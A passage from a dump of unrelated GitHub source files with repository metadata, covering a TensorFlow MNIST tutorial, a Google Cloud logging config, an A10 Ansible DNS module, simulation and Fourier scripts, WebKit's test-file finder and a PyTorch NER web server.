            mo.action_assign()
|
[
"yasir@harpiya.com"
] |
yasir@harpiya.com
|
b3b434b287cc143cda89ffc6336037d41c32a53d
|
e00bfd4ef4bc3bfd97cc26e0b6fa08eae90090a4
|
/mnist_tf_nn.py
|
67e01351550ff086596638d6ae855b0c8471c259
|
[] |
no_license
|
benjaminhuanghuang/dl-study
|
4995f99ed3776e7e01de8eef8e635ec9295a2e51
|
180f315da5c679f10b101ad0731f26bd21aa5772
|
refs/heads/master
| 2021-01-25T13:05:08.687512
| 2018-04-19T03:01:06
| 2018-04-19T03:01:06
| 123,523,798
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,069
|
py
|
'''
TensorFlow Tutorials(1)——Windows下环境搭建
https://www.youtube.com/watch?v=gItz_fBTeLM
TensorFlow系列教程(2)——手写数字的识别
https://www.youtube.com/watch?v=gx7iEa9Q-Vs
TensorFlow Tutorials(3)——FC预测自己手写的图片
https://www.youtube.com/watch?v=WKHP6QBlb8Q
'''
import os
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
from PIL import Image
import cv2
# Read data
# one-hot vector is a vector which is 0 in most dimensions, and 1 in a single dimension
# For example, 3 would be [0,0,0,1,0,0,0,0,0,0]
mnist = input_data.read_data_sets('./data/MNIST', one_hot=True)
# Placeholder for flattened 28x28 images; None leaves batch size variable.
x = tf.placeholder(dtype=tf.float32, shape=[None, 784], name='x')
# mnist.train.labels is a [55000, 10] array of floats
y = tf.placeholder(dtype=tf.float32, shape=[None, 10], name='y')
# Mini-batch size used during training below.
batch_size = 1000
def add_layer(input_data, input_num, output_num, activation_fun=None):
    """Fully-connected layer: activation(input_data @ W + b).

    W is [input_num, output_num], b is [1, output_num], both randomly
    initialized; activation is applied only when a function is given.
    """
    weights = tf.Variable(initial_value=tf.random_normal(shape=[input_num, output_num]))
    biases = tf.Variable(initial_value=tf.random_normal(shape=[1, output_num]))
    result = tf.add(tf.matmul(input_data, weights), biases)
    if activation_fun:
        result = activation_fun(result)
    return result
def build_nn(data):
    """Stack the network: sigmoid 784->100->50, then a linear 10-way output."""
    first_hidden = add_layer(data, 784, 100, activation_fun=tf.nn.sigmoid)
    second_hidden = add_layer(first_hidden, 100, 50, activation_fun=tf.nn.sigmoid)
    return add_layer(second_hidden, 50, 10)
def train_nn(data):
    """Train the network, or restore a saved model and classify ./input.png.

    With no local 'checkpoint' file: train 50 epochs, print test accuracy,
    save to ./tmp/mnist.skpt. Otherwise: restore and run predict().
    """
    # output of NN
    output = build_nn(data)
    # Softmax cross-entropy between the one-hot labels and the logits.
    loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=output))
    # NOTE(review): learning_rate=1 is unusually large for plain SGD — confirm.
    optimizer = tf.train.GradientDescentOptimizer(learning_rate=1).minimize(loss)
    saver = tf.train.Saver()
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        if not os.path.exists('checkpoint'):
            for i in range(50):
                epoch_cost = 0
                for _ in range(int(mnist.train.num_examples / batch_size)):
                    x_data, y_data = mnist.train.next_batch(batch_size)
                    cost, _ = sess.run([loss, optimizer], feed_dict={x: x_data, y: y_data})
                    epoch_cost += cost
                print('Epoch', i, ": ", epoch_cost)
            # Fraction of test images whose argmax prediction matches the label.
            accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(y, 1), tf.argmax(output, 1)), tf.float32))
            acc = sess.run(accuracy, feed_dict={x: mnist.test.images, y: mnist.test.labels})
            print("accuracy: ", acc)
            saver.save(sess, './tmp/mnist.skpt')
        else:
            saver.restore(sess, './tmp/mnist.skpt')
            predict('./input.png', sess, output)
def reconstruct_image():
    """Dump every MNIST training image to ./imgs/<digit>/<index>.bmp."""
    # One output directory per digit class.
    for i in range(10):
        path = './imgs/{}'.format(i)
        if not os.path.exists(path):
            os.makedirs(path)
    batch_size = 1
    for i in range(int(mnist.train.num_examples / batch_size)):
        x_data, y_data = mnist.train.next_batch(batch_size)
        # Rescale [0,1] floats back to 8-bit pixels and reshape to 28x28.
        img = Image.fromarray(np.reshape(np.array(x_data[0]*255, dtype='uint8'), newshape=(28, 28)))
        dir = np.argmax(y_data[0])
        img.save('./imgs/{}/{}.bmp'.format(dir, i))
def read_data(path):
    """Load a grayscale image and flatten it for the network.

    Returns (original_image, row_vector) where row_vector has shape (1, 784).
    """
    image = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
    # is square
    w, h = image.shape
    max_ = max(w, h)
    # NOTE(review): cv2.resize to (max_, max_) only squares the image, and
    # np.resize to (1, 784) truncates/repeats raw pixels rather than
    # downscaling to 28x28 — confirm inputs are already 28x28.
    processed_img = cv2.resize(image, dsize=(max_, max_))
    processed_img = np.resize(processed_img, new_shape=(1, 784))
    return image, processed_img
def predict(image_path, sess, output):
    """Classify one image file with the trained network and display it.

    Args:
        image_path: path of the digit image to classify.
        sess: a live tf.Session holding the trained variables.
        output: the network's output tensor (from build_nn).
    """
    image, processed_image = read_data(image_path)
    result = sess.run(output, feed_dict={x: processed_image})
    result = np.argmax(result, 1)
    print('The prediciton is', result)
    cv2.putText(image, 'The prediction is {}'.format(result), (20, 20),
                cv2.FONT_HERSHEY_COMPLEX, 1, color=(255, 255, 255))
    cv2.imshow('image', image)
    cv2.waitKey(0)
    # Bug fix: was `sv2.destroyAllWindows()` — a NameError raised right
    # after the window closes; the module is cv2.
    cv2.destroyAllWindows()
# Entry point: train the network, or restore it and classify ./input.png.
train_nn(x)
# reconstruct_image()
|
[
"bhuang@rms.com"
] |
bhuang@rms.com
|
60a7352ea9fa28baf709bc3938aeeb9ae85a08f7
|
3b84c4b7b16ccfd0154f8dcb75ddbbb6636373be
|
/google-cloud-sdk/lib/googlecloudsdk/third_party/logging_v2/gapic/config_service_v2_client_config.py
|
918b29fd0f8ebf1f3e73a5596dbf58efcd6af258
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
twistedpair/google-cloud-sdk
|
37f04872cf1ab9c9ce5ec692d2201a93679827e3
|
1f9b424c40a87b46656fc9f5e2e9c81895c7e614
|
refs/heads/master
| 2023-08-18T18:42:59.622485
| 2023-08-15T00:00:00
| 2023-08-15T12:14:05
| 116,506,777
| 58
| 24
| null | 2022-02-14T22:01:53
| 2018-01-06T18:40:35
|
Python
|
UTF-8
|
Python
| false
| false
| 3,721
|
py
|
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Client-side retry/timeout configuration for the ConfigServiceV2 GAPIC
# surface. Every method shares a 60s timeout and the "default" retry
# parameters; they differ only in which retry-code class applies, so the
# per-method entries are generated from the table below.
_RETRY_CODES = {
    "idempotent": [
        "DEADLINE_EXCEEDED",
        "INTERNAL",
        "UNAVAILABLE"
    ],
    "non_idempotent": [],
    "idempotent2": [
        "DEADLINE_EXCEEDED",
        "UNAVAILABLE"
    ]
}

# method name -> retry-code class
_METHOD_RETRY_CLASS = {
    "DeleteSink": "idempotent",
    "UpdateSink": "idempotent",
    "DeleteExclusion": "idempotent",
    "ListBuckets": "idempotent2",
    "GetBucket": "idempotent2",
    "UpdateBucket": "non_idempotent",
    "ListSinks": "idempotent2",
    "GetSink": "idempotent2",
    "CreateSink": "non_idempotent",
    "ListExclusions": "idempotent2",
    "GetExclusion": "idempotent2",
    "CreateExclusion": "non_idempotent",
    "UpdateExclusion": "non_idempotent",
    "GetCmekSettings": "idempotent2",
    "UpdateCmekSettings": "non_idempotent",
}

config = {
    "interfaces": {
        "google.logging.v2.ConfigServiceV2": {
            "retry_codes": _RETRY_CODES,
            "retry_params": {
                "default": {
                    "initial_retry_delay_millis": 100,
                    "retry_delay_multiplier": 1.3,
                    "max_retry_delay_millis": 60000,
                    "initial_rpc_timeout_millis": 20000,
                    "rpc_timeout_multiplier": 1.0,
                    "max_rpc_timeout_millis": 20000,
                    "total_timeout_millis": 600000
                }
            },
            "methods": {
                method_name: {
                    "timeout_millis": 60000,
                    "retry_codes_name": retry_class,
                    "retry_params_name": "default"
                }
                for method_name, retry_class in _METHOD_RETRY_CLASS.items()
            }
        }
    }
}
|
[
"gcloud@google.com"
] |
gcloud@google.com
|
8eb00965d7fe2515246764e9e28869e4defe30b5
|
35fe9e62ab96038705c3bd09147f17ca1225a84e
|
/a10_ansible/library/a10_gslb_zone_service_dns_srv_record.py
|
6af19cd9ec408f7a280cb3b28bd71ada0d1abc4f
|
[] |
no_license
|
bmeidell/a10-ansible
|
6f55fb4bcc6ab683ebe1aabf5d0d1080bf848668
|
25fdde8d83946dadf1d5b9cebd28bc49b75be94d
|
refs/heads/master
| 2020-03-19T08:40:57.863038
| 2018-03-27T18:25:40
| 2018-03-27T18:25:40
| 136,226,910
| 0
| 0
| null | 2018-06-05T19:45:36
| 2018-06-05T19:45:36
| null |
UTF-8
|
Python
| false
| false
| 6,346
|
py
|
#!/usr/bin/python
# (is_valid, message_format) result tuples for parameter validation; the
# format placeholder receives the offending parameter names.
REQUIRED_NOT_SET = (False, "One of ({}) must be set.")
REQUIRED_MUTEX = (False, "Only one of ({}) can be set.")
REQUIRED_VALID = (True, "")
DOCUMENTATION = """
module: a10_dns-srv-record
description:
-
author: A10 Networks 2018
version_added: 1.8
options:
srv-name:
description:
- Specify Domain Name
port:
description:
- Specify Port (Port Number)
priority:
description:
- Specify Priority
weight:
description:
- Specify Weight, default is 10
ttl:
description:
- Specify TTL
uuid:
description:
- uuid of the object
sampling-enable:
"""
EXAMPLES = """
"""
ANSIBLE_METADATA = """
"""
# Hacky way of having access to object properties for evaluation
AVAILABLE_PROPERTIES = {"port","priority","sampling_enable","srv_name","ttl","uuid","weight",}
# our imports go at the top so we fail fast.
from a10_ansible.axapi_http import client_factory
from a10_ansible import errors as a10_ex
def get_default_argspec():
return dict(
a10_host=dict(type='str', required=True),
a10_username=dict(type='str', required=True),
a10_password=dict(type='str', required=True, no_log=True),
state=dict(type='str', default="present", choices=["present", "absent"])
)
def get_argspec():
rv = get_default_argspec()
rv.update(dict(
port=dict(
type='str' , required=True
),
priority=dict(
type='str'
),
sampling_enable=dict(
type='str'
),
srv_name=dict(
type='str' , required=True
),
ttl=dict(
type='str'
),
uuid=dict(
type='str'
),
weight=dict(
type='str'
),
))
return rv
def new_url(module):
"""Return the URL for creating a resource"""
# To create the URL, we need to take the format string and return it with no params
url_base = "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-srv-record/{srv-name}+{port}"
f_dict = {}
f_dict["srv-name"] = ""
f_dict["port"] = ""
return url_base.format(**f_dict)
def existing_url(module):
"""Return the URL for an existing resource"""
# Build the format dictionary
url_base = "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-srv-record/{srv-name}+{port}"
f_dict = {}
f_dict["srv-name"] = module.params["srv-name"]
f_dict["port"] = module.params["port"]
return url_base.format(**f_dict)
def build_envelope(title, data):
return {
title: data
}
def build_json(title, module):
rv = {}
for x in AVAILABLE_PROPERTIES:
v = module.params.get(x)
if v:
rx = x.replace("_", "-")
rv[rx] = module.params[x]
return build_envelope(title, rv)
def validate(params):
# Ensure that params contains all the keys.
requires_one_of = sorted([])
present_keys = sorted([x for x in requires_one_of if params.get(x)])
errors = []
marg = []
if not len(requires_one_of):
return REQUIRED_VALID
if len(present_keys) == 0:
rc,msg = REQUIRED_NOT_SET
marg = requires_one_of
elif requires_one_of == present_keys:
rc,msg = REQUIRED_MUTEX
marg = present_keys
else:
rc,msg = REQUIRED_VALID
if not rc:
errors.append(msg.format(", ".join(marg)))
return rc,errors
def exists(module):
try:
module.client.get(existing_url(module))
return True
except a10_ex.NotFound:
return False
def create(module, result):
payload = build_json("dns-srv-record", module)
try:
post_result = module.client.post(new_url(module), payload)
result.update(**post_result)
result["changed"] = True
except a10_ex.Exists:
result["changed"] = False
except a10_ex.ACOSException as ex:
module.fail_json(msg=ex.msg, **result)
except Exception as gex:
raise gex
return result
def delete(module, result):
try:
module.client.delete(existing_url(module))
result["changed"] = True
except a10_ex.NotFound:
result["changed"] = False
except a10_ex.ACOSException as ex:
module.fail_json(msg=ex.msg, **result)
except Exception as gex:
raise gex
return result
def update(module, result):
payload = build_json("dns-srv-record", module)
try:
post_result = module.client.put(existing_url(module), payload)
result.update(**post_result)
result["changed"] = True
except a10_ex.ACOSException as ex:
module.fail_json(msg=ex.msg, **result)
except Exception as gex:
raise gex
return result
def present(module, result):
if not exists(module):
return create(module, result)
else:
return update(module, result)
def absent(module, result):
return delete(module, result)
def run_command(module):
run_errors = []
result = dict(
changed=False,
original_message="",
message=""
)
state = module.params["state"]
a10_host = module.params["a10_host"]
a10_username = module.params["a10_username"]
a10_password = module.params["a10_password"]
# TODO(remove hardcoded port #)
a10_port = 443
a10_protocol = "https"
valid, validation_errors = validate(module.params)
map(run_errors.append, validation_errors)
if not valid:
result["messages"] = "Validation failure"
err_msg = "\n".join(run_errors)
module.fail_json(msg=err_msg, **result)
module.client = client_factory(a10_host, a10_port, a10_protocol, a10_username, a10_password)
if state == 'present':
result = present(module, result)
elif state == 'absent':
result = absent(module, result)
return result
def main():
module = AnsibleModule(argument_spec=get_argspec())
result = run_command(module)
module.exit_json(**result)
# standard ansible module imports
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
if __name__ == '__main__':
main()
|
[
"mdurrant@a10networks.com"
] |
mdurrant@a10networks.com
|
0a41178fc20f8607e3279660130613dca66b6169
|
4a22da169b96b9d8d4cf30c5ea7e167cdbd1e802
|
/cluster_uva/simulation35xu_rivanna/simulation35xu_rivanna_8.py
|
b78fb63ba51f2061a43dfc5f5f6aae48c9fbb2a9
|
[] |
no_license
|
LiYan1988/simulationsYuxin
|
543fbeaac362f71513c71ceb1d1c300cabf04173
|
5997cecb5d772194900feddd07d7c5001c39b037
|
refs/heads/master
| 2021-01-19T13:50:15.968470
| 2017-03-17T21:52:33
| 2017-03-17T21:52:33
| 82,420,737
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,033
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 25 22:06:02 2017
@author: misWin
This is a template of python files for simulation 3 and 5 with Xu's algorithem on hebbe
"""
from milp2_xu import *
np.random.seed(0)
batch_id = 8
network_cost = pd.read_csv('nsf-24nodes.csv', header=None, index_col=None)
network_cost = network_cost.as_matrix()
sn = Network(network_cost, modulation='bpsk')
demands_file = 'simulation35xu_rivanna_8.csv'
demands = pd.read_csv(demands_file)
iteration_history_tr, iteration_history_gn = \
sn.iterate(demands, random_state=0, mipstart=True, mipfocus=1,
method=-1, mipgap=0.001)
# gurobi model instances cannot be save by pickle
#models_gn = {}
#models_tr = {}
#for i in iteration_history_gn.keys():
# models_gn[i] = iteration_history_gn[i].pop('model', None)
# models_tr[i] = iteration_history_tr[i].pop('model', None)
iteration_history = (iteration_history_tr, iteration_history_gn)
output_file = 'simulation35xu_rivanna_8.pkl'
save_data(output_file, iteration_history)
|
[
"li.yan.ly414@gmail.com"
] |
li.yan.ly414@gmail.com
|
22da5ff4314cfc620cb8d225b70570619873fe70
|
efb7180c05964aee07756dbd4f9982f81559d7e3
|
/TradeBot/tradebotapp/migrations/0002_auto_20191005_1543.py
|
49018395ae8bfb3525d48159fd3e3be4939ec2eb
|
[] |
no_license
|
ShunnoSaiful/Trade-Bot
|
920ba75225d921f54530fc9f0d10a8eb9eabdaaf
|
d07489dea5fcf1d1d51a918a3127f620682107f2
|
refs/heads/master
| 2022-11-24T08:22:00.946773
| 2019-10-29T05:20:08
| 2019-10-29T05:20:08
| 218,207,062
| 0
| 0
| null | 2022-11-22T04:18:04
| 2019-10-29T04:54:41
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 673
|
py
|
# Generated by Django 2.1 on 2019-10-05 15:43
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('tradebotapp', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='question',
name='section',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='tradebotapp.Section'),
preserve_default=False,
),
migrations.AlterField(
model_name='question',
name='question',
field=models.CharField(max_length=500),
),
]
|
[
"sunnosaiful@gmail.com"
] |
sunnosaiful@gmail.com
|
298c589f469654840e1fabc25a5a868de853909a
|
d2304891c5757e0cdb393d95b0c3d3495f6fbf76
|
/fourier.py
|
3ae0c47f18598a85df9bd0a14022cc42226f6cb0
|
[] |
no_license
|
phisyche/Python
|
8b555e540f5aeb243434a6f3eceec3ee3835d288
|
f8897f008723821fdc8a1d9a3bdf462d2c42e49c
|
refs/heads/master
| 2023-03-15T04:49:51.586572
| 2021-03-26T13:45:08
| 2021-03-26T13:45:08
| 52,379,347
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,062
|
py
|
import scipy
import matplotlib . pyplot as plt
pi = scipy .pi
signal_length = 0.5 #[ seconds ]
sample_rate =500 # sampling rate [Hz]
dt = 1./ sample_rate # time between two samples [s]
df = 1/ signal_length # frequency between points in
#in frequency domain [Hz]
t= scipy . arange (0, signal_length ,dt) #the time vector
n_t=len(t) # length of time vector
# create signal
y= scipy .sin (2* pi *50* t)+ scipy .sin (2* pi *70* t+pi /4)
# compute fourier transform
f= scipy .fft(y)
# work out meaningful frequencies in fourier transform
freqs =df* scipy . arange (0 ,( n_t -1)/2. , dtype ='d') #d= double precision float
n_freq = len ( freqs )
# plot input data y against time
plt. subplot (2 ,1 ,1)
plt. plot (t,y, label ='input data ')
plt. xlabel ('time [s]')
plt. ylabel ('signal ')
# plot frequency spectrum
plt. subplot (2 ,1 ,2)
plt. plot (freqs ,abs(f[0: n_freq ]),
label ='abs( fourier transform )')
plt. xlabel ('frequency [Hz]')
plt. ylabel ('abs(DFT( signal )) ')
# save plot to disk
plt. savefig ('fft1 .pdf ')
plt. show () #and display plot on screen
|
[
"kwellingtonmwaura@gmail.com"
] |
kwellingtonmwaura@gmail.com
|
6d49a356fda1c916ac953c333cbc4535b0d6a8f6
|
7bb34b9837b6304ceac6ab45ce482b570526ed3c
|
/external/webkit/Tools/Scripts/webkitpy/layout_tests/port/test_files.py
|
fbbbea565812a9dfcef1d6ac1700e9fe164ef72c
|
[
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.1-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
ghsecuritylab/android_platform_sony_nicki
|
7533bca5c13d32a8d2a42696344cc10249bd2fd8
|
526381be7808e5202d7865aa10303cb5d249388a
|
refs/heads/master
| 2021-02-28T20:27:31.390188
| 2013-10-15T07:57:51
| 2013-10-15T07:57:51
| 245,730,217
| 0
| 0
|
Apache-2.0
| 2020-03-08T00:59:27
| 2020-03-08T00:59:26
| null |
UTF-8
|
Python
| false
| false
| 4,698
|
py
|
#!/usr/bin/env python
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This module is used to find all of the layout test files used by
run-webkit-tests. It exposes one public function - find() -
which takes an optional list of paths. If a list is passed in, the returned
list of test files is constrained to those found under the paths passed in,
i.e. calling find(["LayoutTests/fast"]) will only return files
under that directory."""
import time
from webkitpy.common.system import logutils
_log = logutils.get_logger(__file__)
# When collecting test cases, we include any file with these extensions.
_supported_file_extensions = set(['.html', '.shtml', '.xml', '.xhtml', '.xhtmlmp', '.pl',
'.php', '.svg'])
# When collecting test cases, skip these directories
_skipped_directories = set(['.svn', '_svn', 'resources', 'script-tests'])
def find(port, paths=None):
"""Finds the set of tests under a given list of sub-paths.
Args:
paths: a list of path expressions relative to port.layout_tests_dir()
to search. Glob patterns are ok, as are path expressions with
forward slashes on Windows. If paths is empty, we look at
everything under the layout_tests_dir().
"""
paths = paths or ['*']
filesystem = port._filesystem
return normalized_find(filesystem, normalize(filesystem, port.layout_tests_dir(), paths))
def normalize(filesystem, base_dir, paths):
return [filesystem.normpath(filesystem.join(base_dir, path)) for path in paths]
def normalized_find(filesystem, paths):
"""Finds the set of tests under the list of paths.
Args:
paths: a list of absolute path expressions to search.
Glob patterns are ok.
"""
gather_start_time = time.time()
paths_to_walk = set()
for path in paths:
# If there's an * in the name, assume it's a glob pattern.
if path.find('*') > -1:
filenames = filesystem.glob(path)
paths_to_walk.update(filenames)
else:
paths_to_walk.add(path)
# FIXME: I'm not sure there's much point in this being a set. A list would
# probably be faster.
test_files = set()
for path in paths_to_walk:
files = filesystem.files_under(path, _skipped_directories, _is_test_file)
test_files.update(set(files))
gather_time = time.time() - gather_start_time
_log.debug("Test gathering took %f seconds" % gather_time)
return test_files
def _has_supported_extension(filesystem, filename):
"""Return true if filename is one of the file extensions we want to run a
test on."""
extension = filesystem.splitext(filename)[1]
return extension in _supported_file_extensions
def is_reference_html_file(filename):
"""Return true if the filename points to a reference HTML file."""
if (filename.endswith('-expected.html') or
filename.endswith('-expected-mismatch.html')):
return True
return False
def _is_test_file(filesystem, dirname, filename):
"""Return true if the filename points to a test file."""
return (_has_supported_extension(filesystem, filename) and
not is_reference_html_file(filename))
|
[
"gahlotpercy@gmail.com"
] |
gahlotpercy@gmail.com
|
b4e837341ad2ead1653cd1863d71a44210732c3f
|
a463f5858c663199b6f6e38d9b2dc93e9a9ae730
|
/problem/2003/00_200316/3143_가장빠른문자열타이핑-1.py
|
cac1f53330c94396e5da0297c859ffa05c118f54
|
[] |
no_license
|
do-park/swexpertacademy
|
4993f79e3a73697ecdc71e0f654306466626b00b
|
7cbbb0957ce5191cb44cd35094da5b0d29783e49
|
refs/heads/master
| 2020-12-22T19:26:35.257666
| 2020-10-19T02:02:32
| 2020-10-19T02:02:32
| 236,907,286
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
for tc in range(1, int(input()) + 1):
A, B = input().split()
t = A.count(B)
print(f'#{tc} {len(A) - t * len(B) + t}')
|
[
"dohee.pa@gmail.com"
] |
dohee.pa@gmail.com
|
c22f7efdcb2f21f4d80fc3b4b564f22666cc7f70
|
ddb3fc95f44733e20312c0cbfdb37fc7fd1da5e8
|
/torch_server.py
|
bb5ab48b0490566d51b8c5ffed176c3bd852ae15
|
[] |
no_license
|
ShenDezhou/EXLNet
|
2068ffecb3bebdc705bf49d5ca50076ebd50fab2
|
e1700c2d455205e8760c68e83f43520e03e67367
|
refs/heads/master
| 2023-03-08T17:05:43.205497
| 2021-02-24T07:05:17
| 2021-02-24T07:05:17
| 330,310,719
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,577
|
py
|
import argparse
import itertools
import logging
import os
import time
from types import SimpleNamespace
import falcon
import pandas
import torch
from falcon_cors import CORS
import waitress
import numpy as np
import json
import re
from torch.utils.data import DataLoader
from data import Data
from evaluate import evaluate, handy_tool, calculate_accuracy_f1
from model import RnnForSentencePairClassification, BertYForClassification, NERNet,NERWNet
from utils import load_torch_model
MODEL_MAP = {
'bert': BertYForClassification,
'rnn': NERNet,
'rnnkv': NERWNet
}
logging.basicConfig(level=logging.INFO, format='%(asctime)-18s %(message)s')
logger = logging.getLogger()
cors_allow_all = CORS(allow_all_origins=True,
allow_origins_list=['*'],
allow_all_headers=True,
allow_all_methods=True,
allow_credentials_all_origins=True
)
parser = argparse.ArgumentParser()
parser.add_argument(
'-p', '--port', default=58081,
help='falcon server port')
parser.add_argument(
'-c', '--config_file', default='config/rnn_config.json',
help='model config file')
args = parser.parse_args()
model_config=args.config_file
def result_to_json(string, tags):
item = {"string": string, "entities": []}
entity_name = ""
entity_start = 0
idx = 0
i = -1
zipped = zip(string, tags)
listzip = list(zipped)
last = len(listzip)
for char, tag in listzip:
i += 1
if tag == 3:
item["entities"].append({"word": char, "start": idx, "end": idx+1, "type":'s'})
elif tag == 0:
entity_name += char
entity_start = idx
elif tag == 1:
if (entity_name != "") and (i == last):
entity_name += char
item["entities"].append({"word": entity_name, "start": entity_start, "end": idx + 1, "type": 'bms'})
entity_name = ""
else:
entity_name += char
elif tag == 2: # or i == len(zipped)
entity_name += char
item["entities"].append({"word": entity_name, "start": entity_start, "end": idx + 1, "type": 'bms'})
entity_name = ""
else:
entity_name = ""
entity_start = idx
idx += 1
return item
class TorchResource:
def __init__(self):
logger.info("...")
# 0. Load config
with open(model_config) as fin:
self.config = json.load(fin, object_hook=lambda d: SimpleNamespace(**d))
if torch.cuda.is_available():
self.device = torch.device('cuda')
else:
self.device = torch.device('cpu')
# 1. Load data
self.data = Data(vocab_file=os.path.join(self.config.model_path, 'vocab.txt'),
max_seq_len=self.config.max_seq_len,
model_type=self.config.model_type, config=self.config)
# 2. Load model
self.model = MODEL_MAP[self.config.model_type](self.config)
self.model = load_torch_model(
self.model, model_path=os.path.join(self.config.model_path, 'model.bin'))
self.model.to(self.device)
logger.info("###")
def flatten(self, ll):
return list(itertools.chain(*ll))
def cleanall(self, content):
return content.replace(" ", "", 10**10)
def split(self, content):
line = re.findall('(.*?(?:[\n ]|.$))', content)
sublines = []
for l in line:
if len(l) > self.config.max_seq_len:
ll = re.findall('(.*?(?:[。,]|.$))', l)
sublines.extend(ll)
else:
sublines.append(l)
sublines = [l for l in sublines if len(l.strip())> 0]
return sublines
def bert_classification(self, content):
logger.info('1:{}'.format( content))
lines = self.split(content)
rows = []
for line in lines:
rows.append( {'content': line})
df = pandas.DataFrame(rows)
filename = "data/{}.csv".format(time.time())
df.to_csv(filename, index=False, columns=['content'])
test_set, sc_list, label_list, row_list = self.data.load_file(filename, train=False)
# token_list = []
# for line in sc_list:
# tokens = self.data.tokenizer.convert_ids_to_tokens(line)
# token_list.append(tokens)
data_loader_test = DataLoader(
test_set, batch_size=self.config.batch_size, shuffle=False)
# Evaluate
answer_list, length_list = evaluate(self.model, data_loader_test, self.device, isTest=True)
mod_tokens_list = handy_tool(row_list, length_list)
result = [result_to_json(t, s) for t, s in zip(mod_tokens_list, answer_list)]
entities = [item['entities'] for item in result]
entities = self.flatten(entities)
return {"data": entities}
def on_get(self, req, resp):
logger.info("...")
resp.set_header('Access-Control-Allow-Origin', '*')
resp.set_header('Access-Control-Allow-Methods', '*')
resp.set_header('Access-Control-Allow-Headers', '*')
resp.set_header('Access-Control-Allow-Credentials','true')
content = req.get_param('text', True)
# clean_content =
#clean_content = self.cleanall(content)
resp.media = self.bert_classification(content)
logger.info("###")
def on_post(self, req, resp):
"""Handles POST requests"""
resp.set_header('Access-Control-Allow-Origin', '*')
resp.set_header('Access-Control-Allow-Methods', '*')
resp.set_header('Access-Control-Allow-Headers', '*')
resp.set_header('Access-Control-Allow-Credentials', 'true')
resp.set_header("Cache-Control", "no-cache")
data = req.stream.read(req.content_length)
data = data.decode('utf-8')
# regex = re.compile(r'\\(?![/u"])')
# data = regex.sub(r"\\", data)
jsondata = json.loads(data)
# clean_title = shortenlines(jsondata['1'])
# clean_content = cleanall(jsondata['2'])
content = jsondata['text']
# clean_content = self.cleanall(content)
resp.media = self.bert_classification(content)
logger.info("###")
if __name__=="__main__":
api = falcon.API(middleware=[cors_allow_all.middleware])
api.req_options.auto_parse_form_urlencoded = True
api.add_route('/z', TorchResource())
waitress.serve(api, port=args.port, threads=48, url_scheme='http')
|
[
"bangtech@sina.com"
] |
bangtech@sina.com
|
a285078b484c69bd8ed5c87ab10b6da5ede6f928
|
cf0ab8503d4d704045070deea1e2125375711e86
|
/apps/metrics/v1/urls.py
|
94ae63aec636a2d71a2111dd8c53dd21cbddec4c
|
[] |
no_license
|
faierbol/syncano-platform
|
c3c6468600115752fd9fa5e46a0ad59f75f6bc9c
|
879111874d1ef70418b4890cf970720b0a2be4d8
|
refs/heads/master
| 2023-07-20T10:13:40.066127
| 2021-02-08T15:01:13
| 2021-02-08T15:01:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
# coding=UTF8
from django.urls import path
